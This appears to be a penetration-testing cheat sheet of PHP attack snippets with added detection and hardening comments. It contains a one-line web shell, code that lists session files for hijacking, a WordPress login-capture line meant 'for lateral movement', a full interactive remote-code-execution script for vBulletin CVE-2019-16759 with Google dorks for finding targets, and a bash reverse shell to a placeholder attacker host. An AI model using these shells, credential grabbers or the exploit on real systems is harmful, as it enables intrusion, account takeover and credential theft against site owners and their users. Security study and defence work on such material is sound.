Php
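Start an HTTP server (serves everything in the current directory, unauthenticated, on all interfaces; run it from a directory that holds only the files you mean to share)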
python -m http.server 8000
Simple PHP Shell: https://github.com/heiswayi/simple-php-shell/blob/master/shell.php
// See which functions are enabled: prints the command-execution, file-reading and outbound-request functions this PHP runtime exposes.
// Hardening audit: every name printed is callable; any the application never needs belongs in the php.ini disable_functions directive.
<?php
// get_defined_functions(TRUE) is asked to leave out disabled functions; the anchored
// pattern keeps only exact name matches from the "internal" (built-in) list.
print_r(preg_grep("/^(system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source)$/", get_defined_functions(TRUE)["internal"]));
?>
Simple php shell
// Minimal web shell: hands the `cmd` query-string parameter to system() unchanged, with no authentication or filtering.
// Detection: PHP files under the web root where request data ($_GET/$_POST/$_REQUEST) reaches system()/exec()/passthru()/shell_exec(),
// and access-log entries whose `cmd=` value contains shell syntax. Hardening: list unused command functions in disable_functions.
<?php system($_GET['cmd']);?>
// Get all sessions (to use in the PHPSESSID cookie).
// Defender note: with the default file-based session handler the file names in this directory contain the session IDs,
// so any code running as the web-server user that can list it exposes every active session. Give each site its own
// session.save_path, readable only by that site's PHP process owner.
<?php
// scandir() returns the entry names of the directory reported by session_save_path().
print_r(scandir(session_save_path()));
?>
Capturing WP creds
// Capturing WP creds for lateral movement.
// To grab logins etc., insert before the WP user page.
// What it does: copies the raw request body (php://input) into log.txt, replacing the file's contents on every request
// (no FILE_APPEND flag is passed); the relative path resolves against the script's working directory.
// Detection: integrity checks on WordPress core files (e.g. `wp core verify-checksums`), an unexpected log.txt under the
// web root, and reads of php://input in login-handling code that has no reason to touch the raw body.
<?php file_put_contents('log.txt',file_get_contents('php://input')); ?>
// PHPMailer RCE in WP (CVE-2016-10033)
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
// Vbulletin RCE - CVE-2019-16759 (vBulletin RCE)
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
# Interactive proof-of-concept for CVE-2019-16759: each line typed at the prompt is wrapped in a
# PHP snippet and POSTed to the URL given on the command line.
# Detection: POST requests that carry routestring=ajax/render/widget_php together with a
# widgetConfig[code] form field are the indicator to alert on in web-server and WAF logs.
# Mitigation: apply the vendor patch for CVE-2019-16759 to affected vBulletin installations.
# Requires exactly one argument: the vBulletin URL.
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
# Form field sent with every request; the second field is added inside the loop.
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = input("vBulletin$ ")
# The typed text is concatenated, unescaped, into the PHP code sent as widgetConfig[code].
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
# Only the HTTP status is checked; on 200 the response body is printed as-is.
if r.status_code == 200:
print(r.text)
else:
sys.exit("Exploit failed! :(")
# Ctrl-C ends the session; any other exception exits with its message.
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception as e:
sys.exit(str(e))
base64 decode
// Some code
echo 'bGludXhoaW50LmNvbQo=' | base64 --decode
simple php reverse shell
// Reverse shell: exec() starts an interactive bash whose input and output are redirected to a TCP connection
// to the operator's host on port 443 ("ATTACKING IP" is a placeholder in this listing).
// Detection: the web-server/PHP user spawning /bin/bash, and outbound connections initiated by the web server itself,
// including on 443. Hardening: add exec to disable_functions where unused and restrict egress from web hosts.
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1'");?>
// Code
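<?php
// Print the full contents of webdictionary.txt, or stop with a message if it cannot be opened.
$myfile = fopen("webdictionary.txt", "r") or die("Unable to open file!");
// stream_get_contents() reads the open handle to EOF. The previous
// fread($myfile, filesize(...)) form failed on an empty file (a zero length is
// rejected by fread) and stat'ed the path a second time after opening it.
echo stream_get_contents($myfile);
fclose($myfile);
?>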
<?php
// List the entries of the current directory twice: first in the default
// ascending order, then in descending order.
$dir = ".";

$ascending = scandir($dir);
// SCANDIR_SORT_DESCENDING is the named constant for the sort flag value 1.
$descending = scandir($dir, SCANDIR_SORT_DESCENDING);

print_r($ascending);
print_r($descending);
?>